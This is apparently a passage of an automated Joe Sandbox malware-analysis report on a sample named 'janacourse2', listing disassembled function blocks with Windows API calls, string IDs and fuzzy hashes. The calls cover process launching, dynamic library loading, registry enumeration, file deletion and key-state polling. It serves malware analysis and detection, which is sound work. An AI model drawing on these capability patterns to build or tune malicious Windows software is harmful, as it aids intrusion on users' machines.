                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 010118A5
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 010118AC
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 146765662-0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB7620: _wcslen.LIBCMT ref: 00FB7625
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0101C6EE
                                                                                                            • _wcslen.LIBCMT ref: 0101C735
                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0101C79C
                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0101C7CA
                                                                                                            Similarity
                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 1227352736-4108050209
                                                                                                            APIs
                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0103AEA3
                                                                                                              • Part of subcall function 00FB7620: _wcslen.LIBCMT ref: 00FB7625
                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 0103AF38
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0103AF67
                                                                                                            Similarity
                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                            • String ID: <$@
                                                                                                            • API String ID: 146682121-1426351568
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 01017206
                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0101723C
                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0101724D
                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 010172CF
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                            • String ID: DllGetClassObject
                                                                                                            • API String ID: 753597075-1075368562
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01043E35
                                                                                                            • IsMenu.USER32(?), ref: 01043E4A
                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01043E92
                                                                                                            • DrawMenuBar.USER32 ref: 01043EA5
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3076010158-4108050209
APIs
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
  • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01011E66
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01011E79
• SendMessageW.USER32(?,00000189,?,00000000), ref: 01011EA9
  • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
APIs
Strings
Similarity
• API ID: _wcslen
• String ID: HKEY_LOCAL_MACHINE$HKLM
• API String ID: 176396367-4004644295
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01042F8D
• LoadLibraryW.KERNEL32(?), ref: 01042F94
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01042FA9
• DestroyWindow.USER32(?), ref: 01042FB1
Strings
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FD4D1E,00FE28E9,?,00FD4CBE,00FE28E9,010788B8,0000000C,00FD4E15,00FE28E9,00000002), ref: 00FD4D8D
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FD4DA0
• FreeLibrary.KERNEL32(00000000,?,?,?,00FD4D1E,00FE28E9,?,00FD4CBE,00FE28E9,010788B8,0000000C,00FD4E15,00FE28E9,00000002,00000000), ref: 00FD4DC3
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• LoadLibraryA.KERNEL32 ref: 0100D3AD
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100D3BF
• FreeLibrary.KERNEL32(00000000), ref: 0100D3E5
Strings
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 145871493-2590602151
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FB4EDD,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB4EAE
• FreeLibrary.KERNEL32(00000000,?,?,00FB4EDD,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4EC0
Strings
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FF3CDE,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB4E74
• FreeLibrary.KERNEL32(00000000,?,?,00FF3CDE,?,01081418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FB4E87
Strings
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01022C05
• DeleteFileW.KERNEL32(?), ref: 01022C87
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01022C9D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01022CAE
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01022CC0
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
                                                                                                            • Opcode ID: a9633b6ce86fcc9d55e740875e46fc654133ea5062c0216e8a48d03ab825ac5f
                                                                                                            • Instruction ID: 4454a42e06dea6b9514a4008952dd099d8cebb6c2ede8040e1e97a1d5ac0ed35
                                                                                                            • Opcode Fuzzy Hash: a9633b6ce86fcc9d55e740875e46fc654133ea5062c0216e8a48d03ab825ac5f
                                                                                                            • Instruction Fuzzy Hash: EAB15D72900129ABDF21EBE4CD85EDEBBBDEF48350F1040A6F649A7141EA359A448F61
APIs
• GetCurrentProcessId.KERNEL32 ref: 0103A427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0103A435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0103A468
• CloseHandle.KERNEL32(?), ref: 0103A63D
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: 158ae974d5f6037cda8bee9b91d046734df826a434c51a4d69bd76ef600d9cc2
• Instruction ID: b4d231edb12c41bf356f03f0b7ec0de7484956592c0ef9bc2e12fb439479d026
• Opcode Fuzzy Hash: 158ae974d5f6037cda8bee9b91d046734df826a434c51a4d69bd76ef600d9cc2
• Instruction Fuzzy Hash: 9CA1B071604301AFE720DF29C986F2AB7E5AF88714F14885CF59ADB2D2DB74EC418B91
APIs
  • Part of subcall function 0101DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0101CF22,?), ref: 0101DDFD
  • Part of subcall function 0101DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0101CF22,?), ref: 0101DE16
  • Part of subcall function 0101E199: GetFileAttributesW.KERNEL32(?,0101CF95), ref: 0101E19A
• lstrcmpiW.KERNEL32(?,?), ref: 0101E473
• MoveFileW.KERNEL32(?,?), ref: 0101E4AC
• _wcslen.LIBCMT ref: 0101E5EB
• _wcslen.LIBCMT ref: 0101E603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0101E650
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
• Opcode ID: 5a7465447527d08770c884198edf3b01354a444f1253889f5cc5ac1222a67d5b
• Instruction ID: 5f4361283c815b5b9d05ca07dfe232bd8fdc6c537d032ff015d0ea5050511f8d
• Opcode Fuzzy Hash: 5a7465447527d08770c884198edf3b01354a444f1253889f5cc5ac1222a67d5b
• Instruction Fuzzy Hash: D65180B24083459BD765EBA4DC809DF77ECAF84340F00491EEAC9D3145EE78E2888B66
APIs
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
  • Part of subcall function 0103C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103B6AE,?,?), ref: 0103C9B5
  • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103C9F1
  • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA68
  • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103BAA5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103BB00
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0103BB63
• RegCloseKey.ADVAPI32(?,?), ref: 0103BBA6
• RegCloseKey.ADVAPI32(00000000), ref: 0103BBB3
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
• Opcode ID: 88ad0ab6442e6e56ac83482c6223e44b2312b16c61c8ce568ddca4d5630be794
• Instruction ID: 9737f4aa2693c3230dcca1c2647a0d0e00168365656be521d3a32cfc0f401709
• Opcode Fuzzy Hash: 88ad0ab6442e6e56ac83482c6223e44b2312b16c61c8ce568ddca4d5630be794
• Instruction Fuzzy Hash: 7961B171208201AFD324DF14C890E6ABBE9FF84308F54859DF5998B292CB75ED45CB92
APIs
• VariantInit.OLEAUT32(?), ref: 01018BCD
• VariantClear.OLEAUT32 ref: 01018C3E
• VariantClear.OLEAUT32 ref: 01018C9D
• VariantClear.OLEAUT32(?), ref: 01018D10
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01018D3B
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: 8c8ad6e68ca53de36dc1a108329d98edd1d5c1f5157f5c7cd1a46d13dae8977c
• Instruction ID: 83822d41ba9070006524ba6143e1c7f7a4bbfdd74684e93a158bb5848bea2275
• Opcode Fuzzy Hash: 8c8ad6e68ca53de36dc1a108329d98edd1d5c1f5157f5c7cd1a46d13dae8977c
• Instruction Fuzzy Hash: 32515AB5A00219EFDB10DF68C884AAABBF4FF89310F05855AF945DB314E734EA11CB90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 01028BAE
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 01028BDA
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 01028C32
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 01028C57
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 01028C5F
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: dd0a3db36eec0fb25cc45f0c896702fb10f1abc545a11e90a644e63ae99121db
• Instruction ID: 2e3660945fa76a481438edf7ffe869f6c9c1a40f017e24800eaab7697e8f92e2
• Opcode Fuzzy Hash: dd0a3db36eec0fb25cc45f0c896702fb10f1abc545a11e90a644e63ae99121db
• Instruction Fuzzy Hash: EF514B79A002199FDB11DF65C981AA9BBF5FF48314F088099E849AB362CB35ED41DF90
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 01038F40
• GetProcAddress.KERNEL32(00000000,?), ref: 01038FD0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 01038FEC
• GetProcAddress.KERNEL32(00000000,?), ref: 01039032
• FreeLibrary.KERNEL32(00000000), ref: 01039052
  • Part of subcall function 00FCF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,01021043,?,753CE610), ref: 00FCF6E6
  • Part of subcall function 00FCF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0100FA64,00000000,00000000,?,?,01021043,?,753CE610,?,0100FA64), ref: 00FCF70D
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
• Opcode ID: 6d19b787f82324122c33fbf11d36e4c8e6105112daa4689b62c93a436dc2bdd7
• Instruction ID: 3c772d0a1450ff8e27f9cbab838c6af8f36ab722ea68fd761b5871131c0a685a
• Opcode Fuzzy Hash: 6d19b787f82324122c33fbf11d36e4c8e6105112daa4689b62c93a436dc2bdd7
• Instruction Fuzzy Hash: A45136386052059FCB11DF68C4848ADBBF5FF89314B0881A9F94A9B362D775ED85CF90
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 01046C33
• SetWindowLongW.USER32(?,000000EC,?), ref: 01046C4A
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 01046C73
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0102AB79,00000000,00000000), ref: 01046C98
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 01046CC7
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
• Opcode ID: fcb8ae65498d679613af6b2a9010fef793a5897c1f23b4c2f16ef4e9f6fb9453
• Instruction ID: cca5d27055173f08f7d4d5eacbb1b41431408c04abd391dc579bf53c94a2ccb6
• Opcode Fuzzy Hash: fcb8ae65498d679613af6b2a9010fef793a5897c1f23b4c2f16ef4e9f6fb9453
• Instruction Fuzzy Hash: 6B41A3B5A04108AFE724CE68C9D4BB97FA5EB0A350F0402B4E995A7291E372AD41CA84
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32(?), ref: 00FC9141
                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00FC915E
                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00FC9183
                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00FC919D
                                                                                                            Similarity
                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4210589936-0
                                                                                                            APIs
                                                                                                            • GetInputState.USER32 ref: 010238CB
                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 01023922
                                                                                                            • TranslateMessage.USER32(?), ref: 0102394B
                                                                                                            • DispatchMessageW.USER32(?), ref: 01023955
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01023966
                                                                                                            Similarity
                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                            • String ID:
                                                                                                            • API String ID: 2256411358-0
                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32(?,?), ref: 01011915
                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 010119C1
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 010119C9
                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 010119DA
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 010119E2
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3382505437-0
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01045745
                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0104579D
                                                                                                            • _wcslen.LIBCMT ref: 010457AF
                                                                                                            • _wcslen.LIBCMT ref: 010457BA
                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 01045816
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 763830540-0
                                                                                                            APIs
                                                                                                            • IsWindow.USER32(00000000), ref: 01030951
                                                                                                            • GetForegroundWindow.USER32 ref: 01030968
                                                                                                            • GetDC.USER32(00000000), ref: 010309A4
                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 010309B0
                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 010309E8
                                                                                                            Similarity
                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 4156661090-0
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00FECDC6
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FECDE9
                                                                                                              • Part of subcall function 00FE3820: RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FECE0F
                                                                                                            • _free.LIBCMT ref: 00FECE22
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FECE31
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 336800556-0
                                                                                                            APIs
                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC9693
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00FC96A2
                                                                                                            • BeginPath.GDI32(?), ref: 00FC96B9
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00FC96E2
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225163088-0
                                                                                                            • Opcode ID: 06705fd9a312e242498687109d6864996a3b02750efe167ce9909fbc740f04d9
                                                                                                            • Instruction ID: ab1cb4fcb52671d1f6ab78aeed4d9631981cc546092d1df45ade9bc254bc9276
                                                                                                            • Opcode Fuzzy Hash: 06705fd9a312e242498687109d6864996a3b02750efe167ce9909fbc740f04d9
                                                                                                            • Instruction Fuzzy Hash: 4C21C87181A306EFEB218F54DA49BAD3BA4BF11325F104259F4D0A21D4D3BA5842EF90
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 2931989736-0
                                                                                                            • Opcode ID: 31e1d3f47b920e14478b1b1280091b21bde65470cf494c26e0368a933880c243
                                                                                                            • Instruction ID: 448d6f49243765a30458e43e1ace726a7ca37bf6aabd352da39dae62248e572d
                                                                                                            • Opcode Fuzzy Hash: 31e1d3f47b920e14478b1b1280091b21bde65470cf494c26e0368a933880c243
                                                                                                            • Instruction Fuzzy Hash: BD01B5E564120ABBE2485519AE83FBB739DBB923A4F044025FD849E206F768ED1096E4
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,00FDF2DE,00FE3863,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6), ref: 00FE2DFD
                                                                                                            • _free.LIBCMT ref: 00FE2E32
                                                                                                            • _free.LIBCMT ref: 00FE2E59
                                                                                                            • SetLastError.KERNEL32(00000000,00FB1129), ref: 00FE2E66
                                                                                                            • SetLastError.KERNEL32(00000000,00FB1129), ref: 00FE2E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
